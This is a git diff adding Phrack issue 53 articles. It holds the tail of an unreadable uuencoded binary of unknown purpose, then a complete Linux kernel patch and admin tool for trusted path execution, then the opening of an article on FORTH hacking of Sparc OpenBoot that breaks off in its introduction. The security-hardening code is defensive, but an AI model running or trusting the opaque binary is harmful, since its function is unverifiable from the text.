+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M`````````````````````````````````````````````)K__P``"\!U`^G$
+M`(P&%@")'AP`B38:`(D^&`")%AX`N/__4)K__P``,\`>![\"`;DF`BO/_/.J
+M,\!0FO__``#_-A@`FO__```+P'4#Z8``M`#-&HD6(`")#B(`M##-(:,D`)K_
+M_P``J0$`=`;'!A(`"`#WP@0`=`;'!A0``0",V([`O@(!OP(!Z$X`_S88`/\V
+M&@#_-A8`_S8<`/\V'@#H(0-0Z-`#C-B.P+X"`;\"`>AG`/\6<@#_%G0`_Q9V
+M`+C__U":__\``(I&`K1,S2&P_U#HH0.T3,TAM/^+UXO>.]]T%R:`/_]T#"8X
+M9P%W!B:*9P&+TX/#!NOE.]=T&XO:)H`_`";&!_\&=`<F_U\"!^O')O]7`@?K
+MP,.T`(O7B]X[WW07)H`__W0,)CAG`7(&)HIG`8O3@\,&Z^4[UW0;B]HF@#\`
+M)L8'_P9T!R;_7P('Z\<F_U<"!^O`PU!345(&'E975;W__X[=B^RZ8`#LHC(!
+M@#XR`4!S=X`^,@$J='"X0`".P";V!A<`0'0O@#XR`0]V!X`^,@$:<AR`/C(!
+M'78'@#XR`2=R#H`^,@$K=@R`/C(!,W,%@#8R`8"X0`".P";V!A<``W0%@#8R
+M`8"`/C(!&G4%Q@8R`8'_-A0!:``$H#(!M`!0:@!J`)K__P``75]>'P=:65M8
+MS1C/75]>'P=:65M8SXS8D$55B^P>CMA6BW8,B\8]%@!U`^EE`7<0/0$`=!8]
+M`@!U`^E6`>EZ`3T`!'4#Z30!Z6\!8`8>L`FT-<TA!EB)'C`!H^0!NO__#A^P
+M";0ES2$?'HL6,`&AY`&.V+0EL!C-(1\'81YH1`%HE@":__\```O`=0<STC/`
+MZ3D!:%T`:$0!Z+("@\0$:&8`:$0!Z*8"@\0$'FA$`6H`FO__``"C.`&#/C@!
+M_W4<'FA$`6H"FO__``"C.`&#/C@!_W4',](SP.GP`/\V.`&:__\``!YH1`%J
+M`IK__P``HS@!@SXX`?]U!S/2,\#IRP#_-C@!:@!J`&H"FO__``")%C8!HS0!
+M@SXV`?]U#H,^-`'_=0<STC/`Z:``@SXV`2!\,7\'@SXT`0!V*/\V.`&:__\`
+M`&H`:@%H1`'H?@&#Q`9H1`'H+P)$1`O`=`8STC/`ZVB#/C8!('X#Z3W_=4J#
+M/C0!`'8#Z3'_ZSZ*1@JB.@%J`6@Z`?\V.`'H#P*#Q`;K)U(>BQ8P`8X>Y`&X
+M"27-(1]:_S8X`9K__P``:@":__\``#/2,\#K$O]V#E;_=@K_=@C_=@::__\`
+M`%X?74W*"@!5B^Q6BW8,@WX*`'0#Z98`QP86`0,`C`X:`<<&&`'__\<&'`$`
+M`,<&'@$``(DV(`''!B(!``#'!B0!``#'!B8!``",'BX!QP8L`50`'F@6`9K_
+M_P``'FA4`!YH5`!HSP!J`&@`@&@`@&@`@&@`@&H`:@!6:@!J`)K__P``HQ0!
+MZQ(>:`(!FO__```>:`(!FO__```>:`(!:@!J`&H`FO__```+P'7;H08!7EW"
+M"@!5B^Q=PU6+[.L*BQYX`-'C_Y?F`:%X`/\.>``+P'7K_W8$Z!#\65W#58OL
+M@SYX`"!U!;@!`.L3BQYX`-'CBT8$B8?F`?\&>``SP%W#58OLBTX(M$.*1@:+
+M5@3-(7(#D>L$4.@"`%W#58OL5HMV!`OV?!6#_EA^`[Y7`(DVH@"*A*0`F(OP
+MZQ&+QO?8B_"#_B-_Y<<&H@#__XDV$`"X__]>7<("`%6+[(M>!-'C@:=Z`/_]
+MM$**1@J+7@2+3@B+5@;-(7("ZP50Z)W_F5W#58OL5E?\BWX$'@>+US+`N?__
+M\JZ-=?^+?@:Y___RKO?1*_F']_?&`0!T`J1)T>GSI7,!I))?7EW#58OLM$&+
+M5@3-(7($,\#K!%#H3?]=PU6+[(M>!-'C]X=Z```(=!.X`@!0,\`STE!2_W8$
+MZ&C_@\0(M$"+7@2+3@B+5@;-(7(/4(M>!-'C@8]Z```06.L$4.@&_UW#&0`#
+M`0$``0!;``,!)0`!`!<``P$\``$`'@`#`44``@`%``,!9``!`(0``P'%``$`
+M&``#`6($`@!L``,!4P0"`'(``P%*!`(`<0`#`3P$`@`I``,!%00"`#D`!0#B
+M`P$`!P(#`;D#`@!K``,!H0,"``8``P&:`P$`40`#`3(#`0!1``,!_0(!`%0`
+M`P'=`@$`50`#`=("`0!1``,!N`(!`%,``P&C`@$`50`#`74"`0"&``4`3P(!
+M`%P!`P'M`0(`;@`"`&8!`@!4````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````#"X`17AP;&]R97(`7%-94U1%35P`4$]715)8+D1,3```<@1R!'($```!
+M(`(@`B`$H`*@________________________________________````$P("
+M!`4&"`@(%!4%$_\6!1$"_________________P4%____________________
+M_P__(P+_#_____\3__\"`@4/`O___Q/__________R/_____(_\3_P``````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+!````
+`
+end
+<-->
+
+----[  EOF
+
diff --git a/phrack53/8.txt b/phrack53/8.txt
new file mode 100644
index 0000000..8aa90e3
--- /dev/null
+++ b/phrack53/8.txt
@@ -0,0 +1,724 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 08 of 15
+
+
+-------------------------[  Linux Trusted Path Execution Redux
+
+
+--------[  Krzysztof G. Baranowski  <kgb@manjak.knm.org.pl>
+
+
+
+---[  Introduction
+
+
+The idea of trusted path execution is good, however the implementation which
+appeared in Phrack 52-06 may be a major annoyance even to the root itself, eg.
+old good INN newsserver keeps most of its control scripts in directories owned
+by news, so it would be not possible to run them, when the original TPE patch
+was applied.  The better solution would be to have some kind of access list
+where one could add and delete users allowed to run programs.  This can be
+very easily achieved, all you have to do is to write a kernel device driver,
+which would allow you to control the access list from userspace by using
+ioctl() syscalls.
+
+
+---[  Implementation
+
+
+The whole implementation consists of a kernel patch and an userspace program.
+The patch adds a new driver to the kernel source tree and performs a few minor
+modifications.  The driver registers itself as a character device called "tpe",
+with a major number of 40, so in /dev you must create a char device "tpe" with 
+major number of 40 and a minor number of 0 (mknod /dev/tpe c 40 0).  The most
+important parts of the driver are:
+
+        a)  access list of non-root users allowed to run arbitrary programs
+            (empty by default, MAX_USERS can be increased in
+            include/linux/tpe.h),
+
+	b)  tpe_verify() function, which checks whether a user should be
+            allowed to run the program and optionally logs TPE violation
+            attempts.  The check if should we use tpe_verify() is done before 
+            the program will be executed in fs/exec.c.  If user is not root 
+            we perform two checks and allow execution only in two cases:
+
+		1) if the directory is owned by root and is not group or
+                   world writable (this check covers binaries located
+                   in /bin, /usr/bin, /usr/local/bin/, etc...).
+
+		2) If the above check fails, we allow to run the program
+                   only if the user is on our access list, and the program
+                   is located in a directory owned by that user, which
+                   is not group or world writable.
+
+	    All other binaries are considered untrusted and will not be allowed
+            to run. The logging of TPE violation attempts is a sysctl option
+            (disabled by default).  You can control it via /proc filesystem:
+			echo 1 > /proc/sys/kernel/tpe
+            will enable the logging:
+			echo 0 > /proc/sys/kernel/tpe
+            will turn it off.  All these messages are logged at KERN_ALERT
+            priority.
+
+	c)  tpe_ioctl() function, is our gate to/from the userspace.  The
+            driver supports three ioctls:
+
+		1) TPE_SCSETENT - add UID to the access list,
+		2) TPE_SCDELENT - delete UID from the access list,
+           	3) TPE_SCGETENT - get entry from the access list.
+
+            Only root is allowed to perform these ioctl()s.
+
+The userspace program called "tpadm" is very simple.  It opens /dev/tpe and
+performs an ioctl() with arguments as given by user.
+
+
+---[  In Conclusion
+
+
+Well, that's all.  Except for the legal blurb [1]:
+
+"As usual, there are two main things to consider:
+	1. You get what you pay for.
+	2. It is free.
+	
+The consequences are that I won't guarantee the correctness of this document,
+and if you come to me complaining about how you screwed up your system because
+of wrong documentation, I won't feel sorry for you.  I might even laugh at you.
+
+But of course, if you _do_ manage to screw up your system using this I'd like
+to hear of it.  Not only to have a great laugh, but also to make sure that
+you're the last RTFMing person to screw up.
+
+In short, e-mail your suggestions, corrections and / or horror stories to
+<kgb@manjak.knm.org.pl>."
+
+Krzysztof G. Baranowski - President of the Harmless Manyacs' Club
+http://www.knm.org.pl/                 <prezes@manjak.knm.org.pl>
+--
+[1] My favorite one, taken from Linux kernel Documentation/sysctl/README,
+    written by Rik van Riel <H.H.vanRiel@fys.ruu.nl>.
+
+
+----[  The code
+
+<++> EX/tpe-0.02/Makefile
+#
+# Makefile for the Linux TPE Suite.
+# Copyright (C) 1998 Krzysztof G. Baranowski. All rights reserved.
+#
+# Change this to suit your requirements
+CC        = gcc
+CFLAGS	  = -Wall -Wstrict-prototypes -g -O2 -fomit-frame-pointer \
+            -pipe -m386
+
+all: tpadm patch 
+
+tpadm: tpadm.c
+	$(CC) $(CFLAGS) -o tpadm tpadm.c
+	@strip tpadm
+
+patch:
+	@echo
+	@echo	"You must patch, reconfigure, recompile your kernel"
+	@echo	"and create /dev/tpe (character, major 40, minor 0)"
+	@echo
+
+clean:
+	 rm -f *.o core tpadm
+<-->
+<++> EX/tpe-0.02/tpeadm.c
+/*
+ *     tpe.c - tpe administrator
+ *
+ *     Copyright (C) 1998 Krzysztof G. Baranowski. All rights reserved.
+ *
+ *     This file is part of the Linux TPE Suite and is made available under
+ *     the terms of the GNU General Public License, version 2, or at your
+ *     option, any later version, incorporated herein by reference.
+ *
+ *
+ * Revision history:
+ *
+ * Revision 0.01: Thu Apr  6 20:27:33 CEST 1998
+ *                Initial release for alpha testing.
+ * Revision 0.02: Sat Apr 11 21:58:06 CEST 1998
+ *		  Minor cosmetic fixes.
+ *
+ */
+
+static const char *version = "0.02";
+
+#include <linux/tpe.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <unistd.h>
+#include <string.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <ctype.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <pwd.h>
+
+
+void banner(void)
+{
+	fprintf(stdout, "TPE Administrator, version %s\n", version); 
+	fprintf(stdout,	"Copyright (C) 1998 Krzysztof G. Baranowski. " 
+ 			"All rights reserved.\n");
+	fprintf(stdout, "Report bugs to <kgb@manjak.knm.org.pl>\n");
+}
+
+void usage(const char *name)
+{
+	banner();
+	fprintf(stdout, "\nUsage:\n\t%s command\n", name);
+	fprintf(stdout, "\nCommands:\n"
+                        "  -a username\t\tadd username to the access list\n"
+		        "  -d username\t\tdelete username from the access list\n"
+                        "  -s\t\t\tshow access list\n"
+                        "  -h\t\t\tshow help\n"
+                        "  -v\t\t\tshow version\n");
+}
+
+void print_pwd(int pid)
+{
+	struct passwd *pwd;
+	
+	pwd = getpwuid(pid);
+	if (pwd != NULL) 
+		fprintf(stdout, " %d\t%s\t  %s  \n", 
+		        pwd->pw_uid, pwd->pw_name, pwd->pw_gecos);
+}
+
+void print_entries(int fd)
+{
+	int uid, i = 0;
+
+	fprintf(stdout, "\n UID\tName\t  Gecos  \n");
+	fprintf(stdout, "-------------------------\n");
+	while (i < MAX_USERS) {
+		uid = ioctl(fd, TPE_SCGETENT, i);
+		if (uid > 0)
+			print_pwd(uid);
+		i++;
+	}
+	fprintf(stdout, "\n");
+}
+
+int name2uid(const char *name)
+{
+	struct passwd *pwd;
+
+	pwd = getpwnam(name);
+	if (pwd != NULL)
+		return pwd->pw_uid;
+	else {
+		fprintf(stderr, "%s: no such user.\n", name);
+		exit(EXIT_FAILURE);
+	}
+}
+
+int add_entry(int fd, int uid)
+{
+	int ret;
+	errno = 0;
+	
+	ret = ioctl(fd, TPE_SCSETENT, uid);
+	if (ret < 0) {
+		fprintf(stderr, "Couldn't add entry: %s\n", strerror(errno));
+		exit(EXIT_FAILURE);
+	}
+	return 0;
+}
+
+int del_entry(int fd, int uid)
+{
+	int ret;
+	errno = 0;
+
+	ret = ioctl(fd, TPE_SCDELENT, uid);
+	if (ret < 0) {
+		fprintf(stderr, "Couldn't delete entry: %s\n", strerror(errno));
+		exit(EXIT_FAILURE);
+	}
+	return 0;
+}
+
+int main(int argc, char **argv)
+{
+	const char *name = "/dev/tpe";
+	char *add_arg = NULL;
+	char *del_arg = NULL;
+	int fd, c;
+
+        errno = 0;
+
+	if (argc <= 1) {
+		fprintf(stderr, "%s: no command specified\n", argv[0]);
+		fprintf(stderr, "Try `%s -h' for more information\n", argv[0]);
+		exit(EXIT_FAILURE);
+	}
+
+        fd = open(name, O_RDWR);
+        if (fd < 0) {
+                fprintf(stderr, "Couldn't open file %s; %s\n", \
+                        name, strerror(errno));
+                exit(EXIT_FAILURE);
+        }
+       
+	opterr = 0;
+
+	while ((c = getopt(argc, argv, "a:d:svh")) != EOF)
+		switch (c)  {
+			case 'a':
+				add_arg = optarg;
+				add_entry(fd, name2uid(add_arg));
+				break;
+			case 'd':
+				del_arg = optarg;
+				del_entry(fd, name2uid(del_arg));
+				break;
+			case 's':
+				print_entries(fd);
+				break;
+			case 'v':
+				banner();
+				break;
+			case 'h':
+				usage(argv[0]);
+				break;
+			default :
+				fprintf(stderr, "%s: illegal option\n", argv[0]);
+				fprintf(stderr, "Try `%s -h' for more information\n", argv[0]);
+				exit(EXIT_FAILURE);
+		}
+	exit(EXIT_SUCCESS);
+}
+<-->
+<++> EX/tpe-0.02/kernel-tpe-2.0.32.diff
+diff -urN linux-2.0.32/Documentation/Configure.help linux/Documentation/Configure.help
+--- linux-2.0.32/Documentation/Configure.help	Sat Sep  6 05:43:58 1997
++++ linux/Documentation/Configure.help	Sat Apr 11 21:30:40 1998
+@@ -3338,6 +3338,27 @@
+   serial mice, modems and similar devices connecting to the standard
+   serial ports.
+ 
++Trusted path execution (EXPERIMENTAL)
++CONFIG_TPE
++  This option enables trusted path execution.  Binaries are considered
++  `trusted` if they live in a root owned directory that is not group or
++  world writable.  If an attempt is made to execute a program from a non
++  trusted directory, it will simply not be allowed to run.  This is
++  quite useful on a multi-user system where security is an issue.  Users
++  will not be able to compile and execute arbitrary programs (read: evil)
++  from their home directories, as these directories are not trusted.
++  A list of non-root users allowed to run binaries can be modified
++  by using program "tpadm". You should have received it with this
++  patch. If not please visit http://www.knm.org.pl/prezes/index.html,
++  mail the author - Krzysztof G. Baranowski <kgb@manjak.knm.org.pl>,
++  or write it itself :-). This driver has been written as an enhancement
++  to route's <route@infonexus.cm> original patch. (a check in do_execve() 
++  in fs/exec.c for trusted directories, ie. root owned and not group/world
++  writable). This option is useless on a single user machine.
++  Logging of trusted path execution violation is configurable via /proc
++  filesystem and turned off by default, to turn it on run you must run:
++  "echo 1 > /proc/sys/kernel/tpe". To turn it off: "echo 0 > /proc/sys/..."
++
+ Digiboard PC/Xx Support
+ CONFIG_DIGI
+   This is a driver for the Digiboard PC/Xe, PC/Xi, and PC/Xeve cards
+diff -urN linux-2.0.32/drivers/char/Config.in linux/drivers/char/Config.in
+--- linux-2.0.32/drivers/char/Config.in	Tue Aug 12 22:06:54 1997
++++ linux/drivers/char/Config.in	Sat Apr 11 21:30:53 1998
+@@ -5,6 +5,9 @@
+ comment 'Character devices'
+ 
+ tristate 'Standard/generic serial support' CONFIG_SERIAL
++if [ "$CONFIG_EXPERIMENTAL" = "y" ]; then
++  bool 'Trusted Path Execution (EXPERIMENTAL)' CONFIG_TPE
++fi
+ bool 'Digiboard PC/Xx Support' CONFIG_DIGI
+ tristate 'Cyclades async mux support' CONFIG_CYCLADES
+ bool 'Stallion multiport serial support' CONFIG_STALDRV
+diff -urN linux-2.0.32/drivers/char/Makefile linux/drivers/char/Makefile
+--- linux-2.0.32/drivers/char/Makefile	Tue Aug 12 22:06:54 1997
++++ linux/drivers/char/Makefile	Thu Apr  9 15:34:46 1998
+@@ -34,6 +34,10 @@
+   endif
+ endif
+ 
++ifeq ($(CONFIG_TPE),y)
++L_OBJS += tpe.o
++endif
++
+ ifndef CONFIG_SUN_KEYBOARD
+ L_OBJS += keyboard.o defkeymap.o
+ endif
+diff -urN linux-2.0.32/drivers/char/tpe.c linux/drivers/char/tpe.c
+--- linux-2.0.32/drivers/char/tpe.c	Thu Jan  1 01:00:00 1970
++++ linux/drivers/char/tpe.c	Sat Apr 11 22:06:36 1998
+@@ -0,0 +1,185 @@
++/*
++ * 	tpe.c - tpe driver
++ *
++ *	Copyright (C) 1998 Krzysztof G. Baranowski. All rights reserved.
++ *
++ * 	This file is part of the Linux TPE Suite and is made available under
++ * 	the terms of the GNU General Public License, version 2, or at your
++ *	option, any later version, incorporated herein by reference.
++ *
++ *
++ * Revision history:
++ *
++ * Revision 0.01: Thu Apr  6 18:31:55 CEST 1998
++ *                Initial release for alpha testing.
++ * Revision 0.02: Sat Apr 11 21:32:33 CEST 1998
++ *		  Replaced CONFIG_TPE_LOG with sysctl option.
++ *
++ */
++
++static const char *version = "0.02";
++
++#include <linux/version.h>
++#include <linux/module.h>
++#include <linux/kernel.h>
++#include <linux/sched.h>
++#include <linux/config.h>
++#include <linux/tpe.h>
++#include <linux/mm.h>
++#include <linux/fs.h>
++
++static const char *tpe_dev = "tpe";
++static unsigned int tpe_major = 40;
++static int tpe_users[MAX_USERS];
++int tpe_log = 0;  /* sysctl boolean */
++
++#if 0
++static void print_report(const char *info)
++{
++        int i = 0;
++
++        printk("Report: %s\n", info);
++        while (i < MAX_USERS) {
++                printk("tpe_users[%d] = %d\n", i, tpe_users[i]);
++                i++;
++        }
++}
++#endif
++
++static int is_on_list(int uid)
++{
++        int i;
++
++	for (i = 0; i < MAX_USERS; i++) {
++                if (tpe_users[i] == uid)
++                        return 0;
++        }
++        return -1;
++}
++
++int tpe_verify(unsigned short uid, struct inode *d_ino)
++{
++	if (((d_ino->i_mode & (S_IWGRP | S_IWOTH)) == 0) && (d_ino->i_uid == 0))
++ 		return 0;
++	if ((is_on_list(uid) == 0) &&  (d_ino->i_uid == uid)  && 
++	    (d_ino->i_mode & (S_IWGRP | S_IWOTH)) == 0)
++		return 0;
++
++	if (tpe_log)
++		security_alert("Trusted path execution violation");
++	return -1;
++}
++
++static int tpe_find_entry(int uid)
++{
++        int i = 0;
++
++        while (tpe_users[i] != uid && i < MAX_USERS)
++                i++;
++	if (i >= MAX_USERS)
++		return -1;
++	else
++	        return i;
++}
++
++static void tpe_revalidate(void)
++{
++        int temp[MAX_USERS];
++        int i, j = 0;
++
++        memset(temp, 0, sizeof(temp));
++        for (i = 0; i < MAX_USERS; i++) {
++                if (tpe_users[i] != 0) {
++                        temp[j] = tpe_users[i];
++                        j++;
++		}
++	}
++        memset(tpe_users, 0, sizeof(tpe_users));
++        memcpy(tpe_users, temp, sizeof(temp));
++}
++
++static int add_entry(int uid)
++{
++        int i;
++
++        if (uid <= 0)
++                return -EBADF;
++        if (!is_on_list(uid))
++                return -EEXIST;
++        if ((i = tpe_find_entry(0)) != -1) {
++                tpe_users[i] = uid;
++	        tpe_revalidate();
++	        return 0;
++	} else
++		return -ENOSPC;
++}
++
++static int del_entry(int uid)
++{
++        int i;
++
++        if (uid <= 0)
++                return -EBADF;
++        if (is_on_list(uid))
++                return -EBADF;
++        i = tpe_find_entry(uid);
++        tpe_users[i] = 0;
++        tpe_revalidate();
++        return 0;
++}
++
++static int tpe_ioctl(struct inode *inode, struct file *file,
++                     unsigned int cmd, unsigned long arg)
++{
++        int argc = (int) arg;
++        int retval;
++
++	if (!suser())
++		return -EPERM;
++        switch (cmd) {
++                case TPE_SCSETENT:
++                        retval = add_entry(argc);
++			return retval;
++                case TPE_SCDELENT:
++                        retval = del_entry(argc);
++			return retval;
++		case TPE_SCGETENT:
++			return tpe_users[argc];
++                default:
++                        return -EINVAL;
++        }
++}
++
++static int tpe_open(struct inode *inode, struct file *file)
++{
++	return 0;
++}
++
++static void tpe_close(struct inode *inode, struct file *file)
++{
++	/* dummy */
++}
++
++static struct file_operations tpe_fops = {
++	NULL, 		/* llseek */
++	NULL,		/* read */
++	NULL,		/* write */
++	NULL,		/* readdir */
++	NULL, 		/* select */
++	tpe_ioctl,	/* ioctl*/
++	NULL,		/* mmap */
++	tpe_open,	/* open */
++	tpe_close, 	/* release */
++};
++
++int tpe_init(void)
++{
++	int result;
++
++        tpe_revalidate();
++	if ((result = register_chrdev(tpe_major, tpe_dev, &tpe_fops)) != 0)
++		return result;
++	printk(KERN_INFO "TPE %s subsystem initialized... "
++     		         "(C) 1998 Krzysztof G. Baranowski\n", version);
++	return 0;
++}
+diff -urN linux-2.0.32/drivers/char/tty_io.c linux/drivers/char/tty_io.c
+--- linux-2.0.32/drivers/char/tty_io.c	Tue Sep 16 18:36:49 1997
++++ linux/drivers/char/tty_io.c	Thu Apr  9 15:34:46 1998
+@@ -2030,6 +2030,9 @@
+ #ifdef CONFIG_SERIAL
+ 	rs_init();
+ #endif
++#ifdef CONFIG_TPE
++	tpe_init();
++#endif
+ #ifdef CONFIG_SCC
+ 	scc_init();
+ #endif
+diff -urN linux-2.0.32/fs/exec.c linux/fs/exec.c
+--- linux-2.0.32/fs/exec.c	Fri Nov  7 18:57:30 1997
++++ linux/fs/exec.c	Fri Apr 10 14:02:02 1998
+@@ -47,6 +47,11 @@
+ #ifdef CONFIG_KERNELD
+ #include <linux/kerneld.h>
+ #endif
++#ifdef CONFIG_TPE
++extern int tpe_verify(unsigned short uid, struct inode *d_ino);
++extern int dir_namei(const char *pathname, int *namelen, const char **name,
++                     struct inode *base, struct inode **res_inode);
++#endif
+ 
+ asmlinkage int sys_exit(int exit_code);
+ asmlinkage int sys_brk(unsigned long);
+@@ -652,12 +657,29 @@
+ int do_execve(char * filename, char ** argv, char ** envp, struct pt_regs * regs)
+ {
+ 	struct linux_binprm bprm;
++        struct inode *dir;
++        const char *basename;
++        int namelen;
++
+ 	int retval;
+ 	int i;
+ 
+ 	bprm.p = PAGE_SIZE*MAX_ARG_PAGES-sizeof(void *);
+ 	for (i=0 ; i<MAX_ARG_PAGES ; i++)	/* clear page-table */
+ 		bprm.page[i] = 0;
++
++#ifdef CONFIG_TPE
++	/* Check to make sure the path is trusted.  If the directory is root
++	 * owned and not group/world writable, it's trusted.  Otherwise,
++	 * return -EACCES and optionally log it
++	 */
++	if (!suser()) {
++		dir_namei(filename, &namelen, &basename, NULL, &dir);
++		if (tpe_verify(current->uid, dir))
++			return -EACCES;
++	}
++#endif /* CONFIG_TPE */
++
+ 	retval = open_namei(filename, 0, 0, &bprm.inode, NULL);
+ 	if (retval)
+ 		return retval;
+diff -urN linux-2.0.32/fs/namei.c linux/fs/namei.c
+--- linux-2.0.32/fs/namei.c	Sun Aug 17 01:23:19 1997
++++ linux/fs/namei.c	Thu Apr  9 15:34:46 1998
+@@ -216,8 +216,13 @@
+  * dir_namei() returns the inode of the directory of the
+  * specified name, and the name within that directory.
+  */
++#ifdef CONFIG_TPE
++int dir_namei(const char *pathname, int *namelen, const char **name,
++                     struct inode * base, struct inode **res_inode)
++#else
+ static int dir_namei(const char *pathname, int *namelen, const char **name,
+                      struct inode * base, struct inode **res_inode)
++#endif /* CONFIG_TPE */
+ {
+ 	char c;
+ 	const char * thisname;
+diff -urN linux-2.0.32/include/linux/sysctl.h linux/include/linux/sysctl.h
+--- linux-2.0.32/include/linux/sysctl.h	Tue Aug 12 23:06:35 1997
++++ linux/include/linux/sysctl.h	Sat Apr 11 22:04:13 1998
+@@ -61,6 +61,7 @@
+ #define KERN_NFSRADDRS	18	/* NFS root addresses */
+ #define KERN_JAVA_INTERPRETER 19 /* path to Java(tm) interpreter */
+ #define KERN_JAVA_APPLETVIEWER 20 /* path to Java(tm) appletviewer */
++#define KERN_TPE 21 /* TPE logging */
+ 
+ /* CTL_VM names: */
+ #define VM_SWAPCTL	1	/* struct: Set vm swapping control */
+diff -urN linux-2.0.32/include/linux/tpe.h linux/include/linux/tpe.h
+--- linux-2.0.32/include/linux/tpe.h	Thu Jan  1 01:00:00 1970
++++ linux/include/linux/tpe.h	Thu Apr  9 15:34:46 1998
+@@ -0,0 +1,47 @@
++/*
++ * 	tpe.h - misc common stuff
++ *
++ *	Copyright (C) 1998 Krzysztof G. Baranowski. All rights reserved.
++ *
++ * 	This file is part of the Linux TPE Suite and is made available under
++ * 	the terms of the GNU General Public License, version 2, or at your
++ *	option, any later version, incorporated herein by reference.
++ *
++ */
++
++#ifndef __TPE_H__
++#define __TPE_H__
++
++#ifdef __KERNEL__
++/* Taken from Solar Designers' <solar@false.com> non executable stack patch */
++#define security_alert(msg) { \
++       static unsigned long warning_time = 0, no_flood_yet = 0; \
++\
++/* Make sure at least one minute passed since the last warning logged */ \
++       if (!warning_time || jiffies - warning_time > 60 * HZ) { \
++               warning_time = jiffies; no_flood_yet = 1; \
++               printk( \
++                       KERN_ALERT \
++                       "Possible " msg " exploit attempt:\n" \
++                       KERN_ALERT \
++                       "Process %s (pid %d, uid %d, euid %d).\n", \
++                       current->comm, current->pid, \
++                       current->uid, current->euid); \
++       } else if (no_flood_yet) { \
++               warning_time = jiffies; no_flood_yet = 0; \
++               printk( \
++                       KERN_ALERT \
++                       "More possible " msg " exploit attempts follow.\n"); \
++       } \
++}
++#endif /* __KERNEL__ */
++
++/* size of tpe_users array */
++#define MAX_USERS	32
++
++/* ioctl */
++#define TPE_SCSETENT	0x3137
++#define TPE_SCDELENT	0x3138
++#define TPE_SCGETENT	0x3139
++
++#endif /* __TPE_H__ */
+diff -urN linux-2.0.32/include/linux/tty.h linux/include/linux/tty.h
+--- linux-2.0.32/include/linux/tty.h	Tue Nov 18 20:46:44 1997
++++ linux/include/linux/tty.h	Sat Apr 11 21:45:20 1998
+@@ -283,6 +283,7 @@
+ extern unsigned long con_init(unsigned long);
+ 
+ extern int rs_init(void);
++extern int tpe_init(void);
+ extern int lp_init(void);
+ extern int pty_init(void);
+ extern int tty_init(void);
+diff -urN linux-2.0.32/kernel/sysctl.c linux/kernel/sysctl.c
+--- linux-2.0.32/kernel/sysctl.c	Thu Aug 14 00:02:42 1997
++++ linux/kernel/sysctl.c	Sat Apr 11 21:40:03 1998
+@@ -26,6 +26,9 @@
+ /* External variables not in a header file. */
+ extern int panic_timeout;
+ 
++#ifdef CONFIG_TPE
++extern int tpe_log;
++#endif
+ 
+ #ifdef CONFIG_ROOT_NFS
+ #include <linux/nfs_fs.h>
+@@ -147,6 +150,10 @@
+ 	 64, 0644, NULL, &proc_dostring, &sysctl_string },
+ 	{KERN_JAVA_APPLETVIEWER, "java-appletviewer", binfmt_java_appletviewer,
+ 	 64, 0644, NULL, &proc_dostring, &sysctl_string },
++#endif
++#ifdef CONFIG_TPE
++	{KERN_TPE, "tpe", &tpe_log, sizeof(int),
++	 0644, NULL, &proc_dointvec},
+ #endif
+ 	{0}
+};
+<-->
+
+----[  EOF
+
diff --git a/phrack53/9.txt b/phrack53/9.txt
new file mode 100644
index 0000000..1ac3b11
--- /dev/null
+++ b/phrack53/9.txt
@@ -0,0 +1,379 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 09 of 15
+
+
+-------------------------[  FORTH Hacking on Sparc Hardware
+
+
+--------[  mudge <mudge@l0pht.com>
+
+
+                         L0pht Heavy Industries
+                        [ http://www.L0pht.com ]
+                               presents
+
+                    FORTH Hacking on Sparc Hardware
+                            mudge@l0pht.com
+
+
+[Disclaimer - you can really mess up your system by mucking about with
+ the information below if done incorrectly. Neither The L0pht, nor
+ the author, take any accountability for mis-use of this information.
+ Caution: Contents under pressure! ]
+
+So here it is, about 12:45am on a Monday morning.  SpaceRogue from the l0pht
+just finished kicking my ass at darts the entire night although I managed to
+enjoy myself anyway due to a plethora of Guinness.  Route has been breathing
+down my neck for an article for PHRACK and since the one I proposed to him
+last time we both deemed as completely morally irresponsible (after all, we
+like it that the Internet works on a _somewhat_ consistent basis), I find
+myself dredging up bizarre tricks and knickknacks that I've been playing with.
+
+FORTH.  Well, I could say it's the wave of the future but is has been around
+a long time and doesn't seem to be gaining tremendous popularity.  However, it
+turns out that it is an incredibly interesting programming language that,
+whether you know it or not, plays a very key roll in some of our favorite
+hardware.  Sun Microsystems uses forth for their OpenBoot implementation.
+What this means is that when you power on anything from an old Sun 3/60 that
+is based off of the Motorola 680X0 to an UltraSparc Server based off of the
+UltraSparc 64 bit processor, the hardware and initial bootstrapping code is
+handled by a FORTH interpreter.
+
+For a long time it was infrequent that a hacker would actually be able to lay
+their hands, legitimately, on a piece of Sun hardware and play with the
+OpenBoot prom.  Nowadays I have watched companies throw out older Sun 2's,
+Sun 3's and even Sparc ELC and IPC's in large quantities.  Frequenting your
+local Ham Radio or Tech flea markets can usually yield an older Sun system for
+extremely short cash.  Then again, if you work around them you have "free"
+access to play with the hardware and sometimes that's what the game is all
+about.
+
+As it turns out I happen to have a Sparc at home, at the l0pht, and at work.
+The first two were trash picked and the third is just due to the fact that
+I stopped flipping burgers and decided to make the same amount of money
+doing something I'm more interested in (grin).  Yes, there are plenty of holes
+still around in Solaris, SunOS, and the other operating systems that run on
